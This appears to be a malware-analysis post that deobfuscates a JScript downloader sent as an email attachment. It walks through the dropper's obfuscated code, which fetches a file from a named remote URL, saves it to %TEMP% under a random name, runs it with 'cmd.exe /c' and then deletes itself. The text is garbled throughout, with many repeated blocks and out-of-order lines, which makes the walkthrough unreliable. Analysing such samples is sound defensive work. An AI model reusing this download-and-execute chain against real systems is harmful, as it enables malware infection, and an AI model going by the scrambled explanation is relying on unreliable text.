var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
// Type 3: the index ("7") selects a concatenation of earlier pieces ("cmd." + "exe " + "/c ").
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
How it works to retrieve the "piece of words" ?
var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
(1) var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
=> I have put in red the index to be used to get the right value (remember the first value is at index 0, the second at index 1, etc)
=> var uwabbyranl = "cmd.";
It is the first part for the "cmd.exe ...."
(2) var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
=> a useless array, present in the script only to obfuscate it a bit more.
How can I know it ?
- because a search on the var name (here : ebqypsuzyn) gives only one result : this line => it is not used elsewhere
- the value at the given index is always another array :
here : [4, 3, 2, 3, 7, "zi", 6, 2, 5]
(3) var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
=> the value retrieved is the result of a concatenation (addition, for strings) :
=> I have put in red the index to be used to get the right value (remember the first value is at index 0, the second at index 1, etc)
=> var uwabbyranl = "cmd.";
It is the first part for the "cmd.exe ...."
(2) var ebqypsuzyn = [5, 2, 9, 2, 5, [4, 3, 2, 3, 7, "zi", 6, 2, 5], 2, 3, 8, 9]["5"];
=> a useless array, present in the script only to obfuscate it a bit more.
How can I know it ?
- because a search on the var name (here : ebqypsuzyn) gives only one result : this line => it is not used elsewhere
- the value at the given index is always another array :
here : [4, 3, 2, 3, 7, "zi", 6, 2, 5]
(3) var odynfinteds = [8, 8, 2, 7, 5, 7, 3, uwabbyranl + umqesas0 + ukekkiva]["7"];
=> the value retrieved is the result of a concatenation (addition, for strings) :
=> index 7 (remember, indexes begin at position 0)
=> value at position 7 is the concatenation of uwabbyranl + umqesas0 + ukekkiva
=> var odynfinteds = "cmd.exe /c "
=> value at position 7 is the concatenation of uwabbyranl + umqesas0 + ukekkiva
var uwabbyranl = [3, 2, 8, 6, 9, "cmd.", 5, 6, 1, 5]["5"];
=> "cmd."
var umqesas0 = [1, 4, 9, "exe ", 5, 2, 5, 8, 4]["3"];
=> "exe "
var ukekkiva = [8, "/c ", 7, 6, 6, 7, 9, 9, 8]["1"];
=> "/c "
=> the first part of the run command line (we will see later where this part is used)
Conclusion : only two types of array obfuscation are used to really obfuscate the data used by the main part. The third type only obfuscates the script a bit more and carries no real data.
Now, the useful value is no longer the last value; the index clue is needed to find it.
Now, the useful value is no longer the last value; the index clue is needed to find it.
2-2 ) The script file :
In the previous sample, there was a part getting the script's full path, but it was not used.
Now, at the end of the script, the current script is deleted
The part that get the current script path name :
2-3) The payload path/name :
Now, at the end of the script, the current script is deleted
The part that get the current script path name :
- var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
The part that deletes the script :
=> fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu = "Scr" + "ipt" + "Ful" + "lNa" + "me"
=> var ecystogo = WScript.ScriptFullName
var imis9 = aqympiw;
var aqympiw = WScript;
Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
- jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
Each part :
=> Retrieved by searching for the "strange name" with the search tool of notepad++
Example :
Each part :
=> Retrieved by searching for the "strange name" with the search tool of notepad++
- var jrasujw = new hvaqxena(gvidummulj7);
=> object to manipulate files / folders
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> var gvidummulj7 = epcemescip;
then : jrasujw : new ActiveXObject( "Scripting.FileSystemObject");
=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
=> hvaqxena :
=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4
=> "Scripting.FileSystemObject"
=> var hvaqxena = new Function(ileslyxy5)();
=> var ileslyxy5 = [1, 3, 9, ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq, 1, 1, 7, 4, 5, 6]["3"];
=> ysvafvef4 + otyvzysun + ewnehaca + iqjiwpalo + ofeqyxhuwt + keluqy4 + emytipq
=> "return ActiveXObject;"
=> object to manipulate files / folders
- ifcedyka9 + exolcyky + igoptujmyk + bigpefco
var ifcedyka9 = [4, 6, 2, 7, 7, 2, "del", 3, 3]["6"];
=> "deleteFile"=> "del"
var exolcyky = [2, 1, "ete", 4, 1, 7, 1, 5, 3]["2"];
=> "ete"
var igoptujmyk = [3, 2, 1, 5, 2, 5, 6, 'Fil', 8]["7"];
=> 'Fil'
var bigpefco = [1, 7, 8, 4, "e", 2, 6, 7, 3, 7]["4"];
=> "e"
- ecystogo : we have seen at the beginning of this part that it is the full script path name
=> WScript.ScriptFullName
then : - jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
Example :
FileObjectSystem.deleteFile("J:\\ANALISE\\21_11_2016\\EMAIL_25793.js")
In the previous sample, there was an error :
welerle0 = ymnevi2[ezlajvelevny5 + ysuzsibi2 + uhvaj9 + tutobmytvo0 + hivelg1](epygejm8 + pkekzigl8);
=> they have forgotten the "\\" part between %TEMP% and rad44325.tmp
=> It should have been : C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> It is : C:\Users\DardiM\AppData\Local\Temprad44325.tmp
=> Stream.SaveToFile(%TEMP% + rad44325.tmp)
=> they have forgotten the "\\" part between %TEMP% and rad44325.tmp
=> It should have been : C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> It is : C:\Users\DardiM\AppData\Local\Temprad44325.tmp
In these new samples, they have corrected it :
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
Using the search tool from notepad++ to find what the "strange names" of the vars mean :
var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
(with the error : C:\Users\DardiM\AppData\Local\Temprad44325.tmp)
This time the correct folder and a random payload name are used; they have not forgotten the "\\\\" :
%TEMP% + "\\\\" + Randomname.tmp
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> get a random .tmp file name
=> Example : rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> get a random .tmp file name
=> Example : rad44325.tmp
(with the error : C:\Users\DardiM\AppData\Local\Temprad44325.tmp)
This time the correct folder and a random payload name are used; they have not forgotten the "\\\\" :
%TEMP% + "\\\\" + Randomname.tmp
why four "\" ?!
The backslash is used as a marker character to tell the compiler/interpreter that the next character has some special meaning
\ is an escape marker, so the first \ tells the interpreter that the second \ is a literal character
"\\" => mean : use "\"
then "\\\\" => mean use "\\"
at the concatenation "\\\\" => "\\"
And at the use of the whole string :
C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
The backslash is used as a marker character to tell the compiler/interpreter that the next character has some special meaning
\ is an escape marker, so the first \ tells the interpreter that the second \ is a literal character
"\\" => mean : use "\"
then "\\\\" => mean use "\\"
at the concatenation "\\\\" => "\\"
And at the use of the whole string :
C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
2-4) The case part :
case true:
var hvaqxena = new Function(ileslyxy5)();
var ulosucith = [5, 1, 3, 1, 8, [4, 9, 3, 1, 3, 5, "o", 7, 1], 6, 9]["5"];
var mkolheni2 = [3, 9, [9, 3, 6, "n", 6, 7, 9, 3, 2], 6, 8, 4, 9, 8]["2"];
var emnylpupp4 = [[8, 9, "jnu", 1, 3, 3, 5, 1, 7], 7, 6, 8, 2, 8, 7, 2]["0"];
var geqjyxytp7 = [2, 1, 7, 4, 2, [4, "id", 4, 5, 1, 8, 1, 1], 2, 7, 7]["5"];
var abuqxyhe5 = [7, 7, 7, 1, 1, 9, 1, [7, 5, 3, 6, 2, 6, 6, "jj"]]["7"];
var evgoxhogqo7 = [3, 7, 8, 4, 1, 1, 5, 6, 5, [1, 3, 3, 2, 6, 4, 9, 5, "ep", 9]]["9"];
var jegewyxde = [7, 7, 9, 1, [7, 6, 3, 6, 8, "i", 9, 2, 7], 4, 7, 6, 7]["4"];
var himbatad = [8, 1, 4, 4, 5, 6, 2, 6, 5, [7, "o", 2, 8, 2, 5, 2, 3, 6]]["9"];
var omulpybl5 = [[2, 2, 3, 5, 5, 8, "u", 1, 9], 1, 6, 1, 8, 2, 8, 9]["0"];
var sqyvalapy0 = [[5, 8, 7, 6, 9, 4, 7, 4, 1, "i"], 4, 8, 9, 9, 6, 7, 6, 6, 1]["0"];
var ohucrilc3 = [3, 6, 4, [6, 5, 4, 6, 8, 3, 6, "z", 1, 7], 1, 4, 9, 6, 8]["3"];
var ytelrurm8 = [9, 4, 4, 7, 3, 1, 8, [6, 1, 5, 7, 4, 2, 3, 5, "am", 8]]["7"];
var eziwyqfox3 = [3, 4, 6, 1, 2, 7, 7, 5, [7, 8, 1, 6, 3, 8, 8, "xa", 9, 4], 6]["8"];
var tapkemifwo7 = [8, 6, 6, [5, 2, "yh", 8, 7, 1, 7, 3], 2, 1, 8, 1]["3"];
var rhawuxpullu = [5, 6, 3, 5, 2, 3, 7, 8, 4, [4, 9, 5, 9, 3, 7, "bno", 2, 8, 2]]["9"];
break;
}
Only one part is useful :
var hvaqxena = new Function(ileslyxy5)();
The other parts are the familiar useless-array stuff (see part 2-1) above), only put there to obfuscate the script a bit more
(remember we have seen var hvaqxena : "return ActiveXObject;");
3) Main part - deobfuscated :
var owdeqg2 = yvyndax;
=> Stream.Type = 1
=> The data received will be considered as binary data (not text) when put on the Stream
if (abogikn[qusuhyxi + ynabovx4] == 200) {
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
=> "ADODB.Stream"
var ekwidedul = new hvaqxena(owdeqg2);
=> var ekwidedul = new ActiveXObject("ADODB.Stream");
=> create the Stream object that will be used to save the data received by the request
ekwidedul[urtiwguqja + hgudipcu]();
=> create the Stream object that will be used to save the data received by the request
=> Stream["Open"]
=> Open the Stream : to be able to use it
var qupqykmy = ijigsokhimw3;
=> Open the Stream : to be able to use it
=> URL used : "http ://www .contrivedzh.top/admin.php?f=2.dat"
ekwidedul[lgimonra3 + lgufjaregzi + otvebolhyn] = 0;
=> Stream["Position"] = 0
=> prepare the position where to write the data
var gmavabava8 = derfycgy;
=> prepare the position where to write the data
=> "WScript.Shell"
=> will be used to create an ActiveX object Shell
var ecystogo = imis9[fdukezyh8 + tkymrawcy + jajyhyxwy + afehjate1 + wexuflu];
=> will be used to create an ActiveX object Shell
=> var ecystogo = WScript["ScriptFullName"]
=> The script full name
=> Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
var exet3 = new hvaqxena(gmavabava8);
=> The script full name
=> Example : "J:\\ANALISE\\21_11_2016\\EMAIL_25793.js"
=> var exet3 = new ActiveXObject( "WScript.Shell")
=> Shell object, will be used to run the payload (see above parts)
var qrujcydvipd9 = axduxynat;
=> Shell object, will be used to run the payload (see above parts)
=> "MSXML2.XMLHTTP"
=> the string that will be used to create the HTTP object
var gvidummulj7 = epcemescip;
=> the string that will be used to create the HTTP object
=> "Scripting.FileSystemObject"
=> var gvidummulj7 = epcemescip;
=> var gvidummulj7 = epcemescip;
=> var epcemescip = [9, 3, 7, 9, texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4, 7, 8, 5, 2]["4"];
=> texlopkak1 + tonumejt + tigviqzave7 + soxispi + fhadisuhy + iwebog + bacodta2 + slyplumxop8 + mixemrid4
=> "Scripting.FileSystemObject"
var jrasujw = new hvaqxena(gvidummulj7);
=> new ActiveXObject( "Scripting.FileSystemObject")
=> the object used to manipulate files / folders
var abogikn = new hvaqxena(qrujcydvipd9);
=> the object used to manipulate files / folders
=> new ActiveXObject( "MSXML2.XMLHTTP")
=> create the http object, to make the request
var czeqip = jrasujw[rtyrcomozsa8 + quludvi1 + jzucpekkage + lagyvgeq4 + hhitwycyxd0 + uvmewasca](2) + zgafgado + jrasujw[zcexsaqekg + tfufubres0 + gibdymco0 + ruxrabu]();
=> create the http object, to make the request
=> Path :
=> Example : => C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
abogikn[odojkycxyzd](yzozyvy, qupqykmy, 0);
=> Example : => C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
var czeqip = FileObjectSystem["Get" + "Spe" + "cia" + "lFo" + "lde" + "r"](2) + "\\\\"
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
+ FileObjectSystem["Get" + "Tem" + "pNa" + "me"]
=> var czeqip = FileObjectSystem["GetSpecialFolder"](2) + "\\\\"
+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> Example : rad44325.tmp
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
+ FileObjectSystem["GetTempName"]
GetSpecialFolder"](2)
=> %TEMP%
=> Example : C:\Users\DardiM\AppData\Local\Temp\
GetTempName :
=> Example : rad44325.tmp
=> var odojkycxyzd = [4, 1, 4, 4, 7, 2, 8, 'open', 4, 1]["7"];
=> "open"
=> Stream[open"]("GET", URL,0)
=> Open a connection on the URL
abogikn[pdimuly]();
=> "open"
=> Stream[open"]("GET", URL,0)
=> Open a connection on the URL
=> var pdimuly = [6, 1, "send", 5, 4, 7, 8, 4]["2"];
=> "send"
=> http["send"]()
=> http.send()
=> Make the http request
ekwidedul[osabaq + zudxoba8] = 1;
=> "send"
=> http["send"]()
=> http.send()
=> Make the http request
=> Stream.Type = 1
=> The data received will be considered as binary data (not text) when put on the Stream
=> http.Status == 200 ?
=> test if the request was successfully made
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
}
=> test if the request was successfully made
ekwidedul[snumsisike + hnegfepsuta3](abogikn[yksazbasfo8 + odomebef + zevibnib + jenhadno1]);
=> Stream["Write"](http["ResponseBody"])
=> Stream.Write(http.ResponseBody)
=> Writes the data received by the request, on the Stream object.
ekwidedul[fjynhevonra1 + kzunaxve5 + obutdymi + jyryxxirnu](czeqip);
=> Stream.Write(http.ResponseBody)
=> Writes the data received by the request, on the Stream object.
=> Stream["SaveTofile"](path)
=> Stream.SaveToFile(path)
=> save the data to a file, using the path
=> Example :
ekwidedul[awgykpomoj1 + hdocirzy1]();
=> Stream.SaveToFile(path)
=> save the data to a file, using the path
=> Example :
=> C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
=> Stream["close"]()
=> Stream.close()
=> close the Stream object
var yhamgyv1 = odynfinteds + czeqip;
=> Stream.close()
=> close the Stream object
=> "cmd.exe /c " + path
=> Example : "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp"
=> Example : "cmd.exe /c C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp"
exet3[vwafgehni0](yhamgyv1, 0);
=> Shell["run"](commandLine, 0)
jrasujw[ifcedyka9 + exolcyky + igoptujmyk + bigpefco](ecystogo);
=> I have explained on part 2-3) how to deobfuscate this part
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> delete the current running script
=> FileObjectSystem["deleteFile"](WScript.ScriptFullName)
=> delete the current running script
4) Conclusion :
Some parts have been improved in these new versions.
3 types of arrays are used, one of them completely useless for the malware logic (its data is not used as "puzzle parts", only to obfuscate the script a bit more).
Now, the useful value is not the last value, but need the index clue to be found
The error with folder / name to be used has been solved.
The script deletes itself at the end.
URL :
3 types of arrays are used, one of them completely useless for the malware logic (its data is not used as "puzzle parts", only to obfuscate the script a bit more).
Now, the useful value is not the last value, but need the index clue to be found
The error with folder / name to be used has been solved.
The script deletes itself at the end.
URL :
http ://www .contrivedzh.top/admin.php?f=2.dat
Payload :
Example : C:\Users\DardiM\AppData\Local\Temp\rad44325.tmp
Random name :
Antivirus scan for 413830976864196c4ed5312af9888cf15a541ec0626e6101e2e2bb75276d187a at 2016-11-21 15:56:32 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...ec0626e6101e2e2bb75276d187a?environmentId=100
Random name :
=> rad : means "random"
=> + 5 HEX values (0 => 9 and A => F)
3 / 56
=> + 5 HEX values (0 => 9 and A => F)
Antivirus scan for 413830976864196c4ed5312af9888cf15a541ec0626e6101e2e2bb75276d187a at 2016-11-21 15:56:32 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...ec0626e6101e2e2bb75276d187a?environmentId=100